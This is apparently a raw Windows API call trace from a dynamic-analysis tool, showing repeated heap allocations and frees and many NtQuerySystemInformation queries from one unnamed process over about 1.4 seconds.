GetProcessHeap () returned 0x2026c630000 [0231.864] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807cf0 [0231.864] GetProcessHeap () returned 0x2026c630000 [0231.864] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7450 [0231.865] GetProcessHeap () returned 0x2026c630000 [0231.865] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x104) returned 0x2026c693430 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d732c60 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882f70 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x118) returned 0x2026d7326c0 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805d50 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7300 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732480 | out: hHeap=0x2026c630000) returned 1 [0231.866] GetProcessHeap () returned 0x2026c630000 [0231.866] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1cc) returned 0x2026c6d6520 [0231.867] GetProcessHeap () returned 0x2026c630000 [0231.867] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xf4) returned 0x2026d17c630 [0231.867] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751f7f338 | out: phModule=0xc751f7f338*=0x7ffcea380000) returned 1 [0231.867] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0231.867] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751f7f460, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751f7f460, ResultLength=0x0) returned 0x0 [0231.868] GetProcessHeap () returned 0x2026c630000 [0231.868] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d883070 [0231.868] GetProcessHeap () returned 0x2026c630000 [0231.868] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d777850 [0231.868] GetProcessHeap () returned 0x2026c630000 [0231.868] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807090 [0231.868] GetProcessHeap () returned 0x2026c630000 [0231.869] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7330 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882770 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732c60 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7326c0 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805d50 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7300 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882f70 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d6520 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d17c630 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d777850 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807090 | out: hHeap=0x2026c630000) returned 1 [0231.869] GetProcessHeap () returned 0x2026c630000 [0231.869] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7330 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.870] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d883070 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.870] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882c30 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.870] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c693430 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.870] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882770 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.870] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807cf0 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.870] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7450 | out: hHeap=0x2026c630000) returned 1 [0231.870] GetProcessHeap () returned 0x2026c630000 [0231.871] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806380 [0231.871] GetProcessHeap () returned 0x2026c630000 [0231.871] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7340 [0231.871] GetProcessHeap () returned 0x2026c630000 [0231.871] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x104) returned 0x2026c693430 [0231.872] GetProcessHeap () returned 0x2026c630000 [0231.872] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d732900 [0231.872] GetProcessHeap () returned 0x2026c630000 [0231.872] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882af0 [0231.872] GetProcessHeap () returned 0x2026c630000 [0231.872] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x118) returned 0x2026d732b40 [0231.872] GetProcessHeap () returned 0x2026c630000 [0231.872] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807b90 [0231.872] GetProcessHeap () returned 0x2026c630000 [0231.872] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7640 [0231.872] GetProcessHeap () returned 0x2026c630000 [0231.872] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7327e0 | out: hHeap=0x2026c630000) returned 1 [0231.873] GetProcessHeap () returned 0x2026c630000 [0231.873] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1cc) returned 0x2026c6d6520 [0231.873] GetProcessHeap () returned 0x2026c630000 [0231.873] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x104) returned 0x2026c692440 [0231.873] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751f7f338 | out: phModule=0xc751f7f338*=0x7ffcea380000) returned 1 [0231.873] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0231.873] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751f7f460, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751f7f460, ResultLength=0x0) returned 0x0 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.874] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882fb0 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.874] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x50) returned 0x2026d85f4e0 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.874] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807090 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.874] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d75a0 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.874] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d778250 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.874] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732900 | out: hHeap=0x2026c630000) returned 1 [0231.874] GetProcessHeap () returned 0x2026c630000 [0231.875] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732b40 | out: hHeap=0x2026c630000) returned 1 [0231.875] GetProcessHeap () returned 0x2026c630000 [0231.875] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807b90 | out: hHeap=0x2026c630000) returned 1 [0231.875] GetProcessHeap () returned 0x2026c630000 [0231.875] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7640 | out: hHeap=0x2026c630000) returned 1 [0233.177] GetProcessHeap () returned 0x2026c630000 [0233.177] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882af0 | out: hHeap=0x2026c630000) returned 1 [0233.177] GetProcessHeap () returned 0x2026c630000 [0233.177] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d6520 | out: hHeap=0x2026c630000) returned 1 [0233.178] GetProcessHeap () returned 0x2026c630000 [0233.178] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692440 | out: hHeap=0x2026c630000) returned 1 [0233.178] GetProcessHeap () returned 0x2026c630000 [0233.178] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d85f4e0 | out: hHeap=0x2026c630000) returned 1 [0233.178] GetProcessHeap () returned 0x2026c630000 [0233.178] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807090 | out: hHeap=0x2026c630000) returned 1 [0233.178] GetProcessHeap () returned 0x2026c630000 [0233.178] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d75a0 | out: hHeap=0x2026c630000) returned 1 [0233.178] GetProcessHeap () returned 0x2026c630000 [0233.178] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882fb0 | out: hHeap=0x2026c630000) returned 1 [0233.178] GetProcessHeap () returned 0x2026c630000 [0233.178] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d777760 | out: hHeap=0x2026c630000) returned 1 [0233.179] GetProcessHeap () returned 0x2026c630000 [0233.179] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c693430 | out: hHeap=0x2026c630000) returned 1 [0233.179] GetProcessHeap () returned 0x2026c630000 [0233.179] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d778250 | out: hHeap=0x2026c630000) returned 1 [0233.179] GetProcessHeap () returned 0x2026c630000 [0233.179] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806380 | out: hHeap=0x2026c630000) returned 1 [0233.179] GetProcessHeap () returned 0x2026c630000 [0233.179] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7340 | out: hHeap=0x2026c630000) returned 1 [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.185] GetProcessHeap () returned 0x2026c630000 [0233.185] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d64da00 [0233.186] GetProcessHeap () returned 0x2026c630000 [0233.186] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d653ab0 [0233.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef10, Length=0x50, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef10, Length=0x50, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef10, Length=0x50, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee00, Length=0x50, ResultLength=0x0) [0233.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee00, Length=0x50, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee00, Length=0x50, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee00, Length=0x50, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x38, ResultLength=0x0) [0233.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x28, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x28, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x28, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x28, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebd0, Length=0x28, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x38, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x28, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x28, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x20, ResultLength=0x0) [0233.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x20, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x20, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x38, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x38, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x20, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x50, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x50, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd80, Length=0x50, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x50, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x50, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x50, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x50, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x38, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9d0, Length=0x28, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9d0, Length=0x28, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9d0, Length=0x28, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9d0, Length=0x28, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da40, Length=0x28, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x38, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x28, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x28, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x38, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dba0, Length=0x38, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x20, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x20, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfd0, Length=0x50, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfd0, Length=0x50, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfd0, Length=0x50, ResultLength=0x0) 